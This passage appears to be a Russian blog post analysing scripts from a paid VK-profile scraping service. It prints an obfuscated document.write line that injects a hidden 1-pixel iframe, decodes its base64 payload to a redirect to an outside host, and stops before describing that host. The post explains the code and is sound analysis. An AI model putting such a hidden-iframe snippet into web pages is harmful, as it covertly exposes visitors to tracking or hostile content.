Доброго времени суток.
Недавно исследовал интересный сервис по сбору VK профилей:
Вход в сервис стоит 5000 рублей единоразово и 5 рублей за каждый собранный профиль человека.
Цель была узнать как и что работает при определении профиля человека, но речь пойдет не об этом. При тщательном ковырянии в работе скриптов нашел интересный кусок, который к определению имеет отношение примерно никакое 🙂
А нашелся собственно вот такой вот код
|
1 |
document.write('<iframe sandbox=\'allow-same-origin allow-scripts\' seamless id=\'sfrload\' src=\'data:text/html;charset=utf-8;base64,PCEtLSAtLT48c2NyaXB0IGFzeW5jPiB3aW5kb3cubG9jYXRpb24uaHJlZiA9ICJodHRwczovL3lvdTQzLnJ1L3lhbmRpbnRzaXRlLz91PWZiYjg5ZTM2YzM1OTJmMjIyMTZjZTMzM2Q4ZDFhMjUwIjsgPC9zY3JpcHQ+PCEtLSAtLT4=\' style=\'width:1px;height:1px;opacity:0;\'><\/iframe>'); |
Для тех кто не шарит: код вставляет на страницу 1 пиксельный прозрачный фрейм с таким содержанием(зашифрованным в base64)
|
1 |
<!-- --><script async> window.location.href = "https://you43.ru/yandintsite/?u=fbb89e36c3592f22216ce333d8d1a250"; </script><!-- --> |
Т.е. идет переадресация фрейма на адрес https://you43.ru/yandintsite/?u=fbb89e36c3592f22216ce333d8d1a250
И самое интересное находится по этому адресу